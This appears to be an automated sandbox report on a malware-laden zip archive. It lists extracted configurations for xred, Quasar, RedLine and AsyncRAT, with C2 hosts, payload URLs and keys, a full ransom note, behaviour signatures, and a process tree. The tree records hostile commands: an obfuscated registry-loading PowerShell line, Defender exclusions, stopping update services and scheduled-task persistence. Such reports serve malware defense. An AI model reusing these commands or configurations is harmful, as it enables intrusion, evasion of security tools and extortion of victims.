Resubmissions

13-01-2025 17:50

250113-wewjza1pes 10

13-01-2025 17:32

250113-v4m4fssrgj 10

Analysis

  • max time kernel
    159s
  • max time network
    426s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-01-2025 17:32

General

  • Target

    New Text Document mod.exe.zip

  • Size

    392KB

  • MD5

    209c2bed74ce311f3de2c3040f5cbd8b

  • SHA1

    676dbe2bbf178ca27210c8a2e37aa9652f4e17d5

  • SHA256

    672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

  • SHA512

    44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324

  • SSDEEP

    6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

other-little.gl.at.ply.gg:11758

Mutex

fbbc34bd-7320-405e-aebb-d4c666ee475f

Attributes
  • encryption_key

    FEA99DED4EFE826DE2850621FD7919E62525FD26

  • install_name

    DirectX111.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    DirectX

  • subdirectory

    SubDir

Extracted

Family

redline

Botnet

1V

C2

195.177.92.88:1912

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

0.tcp.in.ngrok.io:10147

Mutex

Q52IWD1RYgpZ

Attributes
  • delay

    3

  • install

    false

  • install_file

    Listopener.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

Standoff

C2

89.23.101.77:1912

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Office04

C2

20.107.53.25:25535

Mutex

QSR_MUTEX_zQ0poF2lHhCSZKSUZ3

Attributes
  • encryption_key

    E2xbpJ93MnABcIqioTDL

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note
ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :91B4E4EF265777F9805A257A6CF869405C7F96547184187E6FF860987B6E7D3828A9DF7954503876CE593C61AC17964B520AF63C915E8D3C3EECCA25167440DFC3A8CB053DD62BA81ABFF8EF7857F8ECDFF45375FEE45F1843BDE370B927E1792311A72923452374890D1509E14F7D61F79197CEE8145E62BEC7A02EB54BB9659BE281DD077CBD81AD17C516127BFC9E44ACE87855E4BFC87B56EC9598AF016F2EBB778B81D184215C92764CE0FA1072648066E80CB9CCCDF8F1AC26DC9168796ACBEFBF9FC3A6EB60BBC1FD529B9BDEC850407055291007A2ACB5F816F8A1217ABB81678B73A14B977BED44E72FFCC7DBBD5B0C9C64C9E9089BFC242752ED556434A0A8B1689F95B9198488CF5399AB4AE15A035CF15329037CF9DEBABA8DD65835B859437A8B98CBD3ADE34AE175BFEF2DED465B01E2D0092E85B2B713FF6A75F009BC7541540D997E2E57AA96061B09FDFC2669A3F071981931837E1E0EB296C0121FF15260B8C3CBF42CB995EDE419466760D7830A5E06FB5557B27683D70DE4DE46A013E0E397C284802761CDF60F5395BD97BBE4088ACED22DBC27D03C3C33BBB7F1AE526530083C0571787A44B13AA5B5941DD4EEF1884DE2B44F9657F98DFFFEEA61F64A554B872135C8DCF3779B07AF95F509CBA908B86E7F17B371CCB37058FF9132275B7AD56867AE896D8696AA3366625979563BC454152892F00F5F5B886B99353F048A522135D6202D4046773BC3EFFA63EB2121E8B58774DC120B9B9A41FDBE194D10FD58C455EBBB023855295DA919201D6D89AFDC0368B38595314D19B2C22381F99CDB72DFDFBF077230DF54F25991A9175C81EF3A096E0D16B0BD443067DFA9BB81FD94CFD259076A276E6C164FEDD0E305639E8807F34E44E253B346FFDB4F8DA7266CAC4D97A0F55E7E3B6AF4C793BE593DC7F15A29288AEDA28FAEA10A0BCD69860846D05FF26619CFD576E5A511C7FEECC364848397D8D0F6F649CC04F9D4864DAD190E34FDA7538A7B19E4683F07F011627F3F52E6EFD24934912CE7E66CE8734C5F7E9081A83BEC84F406D423149348B9164B003A5BA9F1710272FD6B411C8273666A3F0280E97E238D507189887BFCC46DE139133FB12E31F8164C371A4C2DA2CA8E49A3E61E9D91BE7ED6D1B12BC1E879C3EC523B2F43FE36808A2C8D1755836FB93CF560B5D1FADFB90AB07359C06FCD922925392E65DB6FFEEE0F3619C630D4C409B49378280EDA588B49831589A1BA009B0B861729EA846FC0F3CF4BC73F0C2824713D8EF26FBA73755C4C7BECB921A3B2E208A89B9764C59A3015AD8EB56C2895EE28EADFD400B8FF250DF611B2175CD89D54B1F04C5C88FDD48F858B40B89011825323DB1583C85F45E4104E16884C528258D2000CFAAA259FBDF48716E10C89A35352906E0F315ACED5068B73843589751D7782D9237B35CF68F661339C11D4890641874241D458726BC74DA47AC831F3F93CEF6C92A331F033986CD34C3736FFF8CC87BC60FE58A8AD4BE22ED2A5C586BE4134405FCAB9087085467F16D3EEEE8AD63EEC4C238705975B17E4AE77AB2B4F39D6362067999611FBFF51B13898A60C830EE273CAD1BFACA5964E0C8438764E3C3210BE6590F504912FBBB92F55F9D79C9AF5E6D07C5D5CB877D1ECE8F9D74C1F6A0F99557AB853E3BED99DE1C57E5C7637CCA414A78434D8F780BB44B6D0822879A8014490F4277F18274F84633F3E8802367E6034F9E326482E11F37C92652E77B3521C15F783B43A3AFF0F47400FFCE5098E1BDA816A78363514EFA18584BB3F5DB273650EBBA97561ECEAF0232A8307760052414D4A70B9760BC5808A4573E678D4E52D931777CDF9DFF0C053474DAC429547F6126BCB26362B09D88E0B01F16D1F909924AB3DF22F6792712657DBE3DCBF14EC3CAB97806C624D5C6D8515374275631217776289C2D927FF2B7E1157CD3FC5E04CB7D183B1DB9D89C6D4D7D1C01F3EEFA2764D14055A73BB7018D745368DD839CA4E8E1F415C46CC52FE6F138EB7CFBC14ADE9109F0BF163F022FE62EBA3C119A01EA52BA69969144C10038A0A6707FB31E6651B1F955C18948D07D9CC2C8BE1A2FA207944AF32429F94BC82DBE2E2F0234E71CE9B31EDCB9FB26E105CA7FE653818DE04A7776E61EE684D79C5DB7BA010ECC0547C1E585F3A9D1A89915585A367812CC532F73D44E3323C5A529D3332476DD1A493E5711F0668026698D6410650743781C002E5D891754A808B27152D2948592A728079E5862533B973BEBD3A29F20058AABA7C39FD70B47B9B8E798EBA0AB9CF170A698BD4E707FED5067C1CD3162A418D4245D2B753F80F1D68519AE3F52A

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 5 IoCs
  • Meduza family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT 6 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 16 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 26 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of UnmapMainImage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{999c1eac-dc8b-4974-83fe-83f50764bb07}
        2⤵
          PID:3296
      • C:\Windows\system32\services.exe
        C:\Windows\system32\services.exe
        1⤵
        • Sets service image path in registry
        • Loads dropped DLL
        PID:472
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
          • Suspicious use of UnmapMainImage
          PID:600
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
            • Drops file in System32 directory
            PID:1240
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1440
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              3⤵
              • Checks processor information in registry
              PID:2540
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              3⤵
                PID:1888
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                3⤵
                  PID:4964
                • C:\Windows\system32\DllHost.exe
                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                  3⤵
                    PID:3776
                  • C:\Windows\system32\DllHost.exe
                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                    3⤵
                      PID:292
                    • C:\Windows\system32\DllHost.exe
                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                      3⤵
                        PID:4128
                      • C:\Windows\system32\DllHost.exe
                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                        3⤵
                          PID:3252
                        • C:\Windows\system32\DllHost.exe
                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                          3⤵
                            PID:3596
                          • C:\Windows\system32\DllHost.exe
                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                            3⤵
                              PID:4560
                            • C:\Windows\system32\DllHost.exe
                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                              3⤵
                                PID:3804
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k RPCSS
                              2⤵
                                PID:676
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                2⤵
                                • Modifies security service
                                • Indicator Removal: Clear Windows Event Logs
                                PID:752
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                2⤵
                                  PID:812
                                  • C:\Windows\system32\Dwm.exe
                                    "C:\Windows\system32\Dwm.exe"
                                    3⤵
                                      PID:1168
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs
                                    2⤵
                                    • Drops file in Windows directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:840
                                    • C:\Windows\system32\wbem\WMIADAP.EXE
                                      wmiadap.exe /F /T /R
                                      3⤵
                                        PID:2624
                                      • C:\Windows\system32\taskeng.exe
                                        taskeng.exe {CD20FE6D-52F6-422A-8A10-220800B94C19} S-1-5-18:NT AUTHORITY\System:Service:
                                        3⤵
                                          PID:628
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](76)+''+[Char](77)+''+[Char](88)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:4656
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService
                                        2⤵
                                          PID:968
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k NetworkService
                                          2⤵
                                            PID:280
                                          • C:\Windows\System32\spoolsv.exe
                                            C:\Windows\System32\spoolsv.exe
                                            2⤵
                                              PID:948
                                            • C:\Windows\system32\taskhost.exe
                                              "taskhost.exe"
                                              2⤵
                                                PID:1088
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                                2⤵
                                                  PID:1096
                                                • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                                  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                                  2⤵
                                                    PID:2020
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                                    2⤵
                                                      PID:3056
                                                    • C:\Windows\system32\sppsvc.exe
                                                      C:\Windows\system32\sppsvc.exe
                                                      2⤵
                                                        PID:2988
                                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                        2⤵
                                                          PID:1120
                                                        • C:\ProgramData\Screenshots\Lightshot.exe
                                                          C:\ProgramData\Screenshots\Lightshot.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4868
                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4924
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            3⤵
                                                              PID:5108
                                                              • C:\Windows\system32\wusa.exe
                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                4⤵
                                                                • Drops file in Windows directory
                                                                PID:3268
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:5116
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:3348
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:3536
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop bits
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:4328
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop dosvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:3696
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3788
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3804
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3808
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3820
                                                            • C:\Windows\system32\dialer.exe
                                                              C:\Windows\system32\dialer.exe
                                                              3⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3836
                                                            • C:\Windows\system32\dialer.exe
                                                              C:\Windows\system32\dialer.exe
                                                              3⤵
                                                                PID:3948
                                                              • C:\Windows\system32\dialer.exe
                                                                dialer.exe
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3668
                                                            • C:\Windows\system32\vssvc.exe
                                                              C:\Windows\system32\vssvc.exe
                                                              2⤵
                                                                PID:4668
                                                              • C:\ProgramData\Screenshots\Lightshot.exe
                                                                C:\ProgramData\Screenshots\Lightshot.exe
                                                                2⤵
                                                                  PID:3572
                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:1612
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                    3⤵
                                                                      PID:2736
                                                                      • C:\Windows\system32\wusa.exe
                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                        4⤵
                                                                          PID:1056
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:3376
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:2568
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:3044
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop bits
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:3088
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:3228
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        3⤵
                                                                        • Power Settings
                                                                        PID:688
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        3⤵
                                                                        • Power Settings
                                                                        PID:4104
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        3⤵
                                                                        • Power Settings
                                                                        PID:1152
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        3⤵
                                                                        • Power Settings
                                                                        PID:4544
                                                                      • C:\Windows\system32\dialer.exe
                                                                        C:\Windows\system32\dialer.exe
                                                                        3⤵
                                                                          PID:2160
                                                                    • C:\Windows\system32\lsass.exe
                                                                      C:\Windows\system32\lsass.exe
                                                                      1⤵
                                                                        PID:488
                                                                      • C:\Windows\system32\lsm.exe
                                                                        C:\Windows\system32\lsm.exe
                                                                        1⤵
                                                                          PID:496
                                                                        • C:\Windows\Explorer.EXE
                                                                          C:\Windows\Explorer.EXE
                                                                          1⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1192
                                                                          • C:\Program Files\7-Zip\7zFM.exe
                                                                            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"
                                                                            2⤵
                                                                            • Quasar RAT
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:2716
                                                                          • C:\Users\Admin\Desktop\New Text Document mod.exe
                                                                            "C:\Users\Admin\Desktop\New Text Document mod.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Adds Run key to start application
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2636
                                                                            • C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
                                                                              "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:636
                                                                              • C:\Users\Admin\Desktop\a\voidware_loader.exe
                                                                                "C:\Users\Admin\Desktop\a\voidware_loader.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2384
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
                                                                                  5⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:2724
                                                                                • C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2608
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
                                                                                    6⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2068
                                                                              • C:\Users\Admin\Desktop\a\cbot.exe
                                                                                "C:\Users\Admin\Desktop\a\cbot.exe"
                                                                                4⤵
                                                                                  PID:912
                                                                                • C:\Users\Admin\Desktop\a\Client.exe
                                                                                  "C:\Users\Admin\Desktop\a\Client.exe"
                                                                                  4⤵
                                                                                    PID:1264
                                                                                  • C:\Users\Admin\Desktop\a\svhost.exe
                                                                                    "C:\Users\Admin\Desktop\a\svhost.exe"
                                                                                    4⤵
                                                                                      PID:1496
                                                                                    • C:\Users\Admin\Desktop\a\mimikatz.exe
                                                                                      "C:\Users\Admin\Desktop\a\mimikatz.exe"
                                                                                      4⤵
                                                                                        PID:4632
                                                                                      • C:\Users\Admin\Desktop\a\123.exe
                                                                                        "C:\Users\Admin\Desktop\a\123.exe"
                                                                                        4⤵
                                                                                          PID:3824
                                                                                        • C:\Users\Admin\Desktop\a\xmrig.exe
                                                                                          "C:\Users\Admin\Desktop\a\xmrig.exe"
                                                                                          4⤵
                                                                                            PID:4476
                                                                                          • C:\Users\Admin\Desktop\a\chrtrome22.exe
                                                                                            "C:\Users\Admin\Desktop\a\chrtrome22.exe"
                                                                                            4⤵
                                                                                              PID:1248
                                                                                              • C:\Users\Admin\Desktop\a\._cache_chrtrome22.exe
                                                                                                "C:\Users\Admin\Desktop\a\._cache_chrtrome22.exe"
                                                                                                5⤵
                                                                                                  PID:3676
                                                                                                  • C:\Users\Admin\Desktop\a\a\voidware_loader.exe
                                                                                                    "C:\Users\Admin\Desktop\a\a\voidware_loader.exe"
                                                                                                    6⤵
                                                                                                      PID:4668
                                                                                                    • C:\Users\Admin\Desktop\a\a\build.exe
                                                                                                      "C:\Users\Admin\Desktop\a\a\build.exe"
                                                                                                      6⤵
                                                                                                        PID:4052
                                                                                                      • C:\Users\Admin\Desktop\a\a\gem2.exe
                                                                                                        "C:\Users\Admin\Desktop\a\a\gem2.exe"
                                                                                                        6⤵
                                                                                                          PID:3060
                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:1364
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                            7⤵
                                                                                                              PID:4776
                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                8⤵
                                                                                                                  PID:4792
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                7⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1920
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                7⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:3576
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                7⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:4888
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                7⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:4676
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                7⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2340
